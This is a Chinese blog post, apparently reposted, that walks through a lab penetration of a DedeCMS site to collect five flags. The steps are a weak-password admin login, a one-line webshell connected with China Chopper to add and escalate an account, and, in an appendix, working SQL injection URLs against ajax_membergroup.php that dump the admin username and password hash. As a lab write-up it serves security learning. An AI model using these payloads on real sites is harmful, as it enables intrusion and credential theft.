实验吧delecms综合渗透

本文通过实战演示如何对织梦CMS进行渗透测试,包括利用默认后台登录、爆破管理员密码及利用SQL注入获取敏感信息等步骤。

环境说明:

    名字:网站综合渗透_dedecms

    环境:目标机:192.168.1.3

        织梦cms




开始渗透:


网站首页:

wKiom1mAi_ywXJSqAABn7zmgMEU883.png-wh_50



先去后台看看。看看默认后台dede在不在,答案是存在的,如下图

wKioL1mAjJSzAB6NAABriAr-rio914.png-wh_50


得到key2:

得到了后台,但是不知道密码,但是觉得这种实验环境后台密码应该都是弱口令

于是试了一下账号:admin 密码:admin123 登录成功:登录成功的地方会显示key2,但是一闪即逝,就不截图了。

wKioL1mAjYCy3yB_AACg-fsai7I074.png-wh_50

得到key4:

wKiom1mAj4jzZQdZAACo-QCAuiY467.png-wh_50

wKioL1mAj4mTomFyAAAuNQfmQMU682.png-wh_50



得到key1:

wKiom1mAkVzTECD9AACielGPruo566.png-wh_50


得到key3:在默认模板里

wKiom1mAk2vT9HfWAACnjVizGpU271.png-wh_50

wKiom1mAk1iB9aF5AAAUrbnEfNs146.png-wh_50

wKiom1mAk_3C8thrAAAi5yJ4l_E229.png-wh_50


得到key5:添加一个一句话木马,用菜刀连接以后添加一个账户并且提到管理员权限。找到key5,修改为允许权限。得到key5

wKioL1mAmJDAQEURAABcOIa6axQ739.png-wh_50

wKiom1mAmJGig4ILAAAMjnY7zts591.png-wh_50

wKioL1mAmJHAGbqOAACXp3nmeSk576.png-wh_50



渗透结束:得到了5个key,但是key太长了,又没法复制,所以也就没提交。

加油



附录:


后来通过搜索,其实可以通过注入得到管理员账号密码:

爆管理员用户名的语句:

/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`

得到管理员用户名:admin

爆管理员密码的语句:

/member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@

得到密码:23a7bbd73250516f069d

爆出来的密码是20位,而md5是16位,去掉前边3位和最后1位即可得到16位的md5密文:7bbd73250516f069,直接解密即可



wKiom1mAmPDSXHeBAAQF1aT1ixQ560.png


本文转自 天道酬勤VIP 51CTO博客,原文链接:http://blog.51cto.com/tdcqvip/1952827


评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值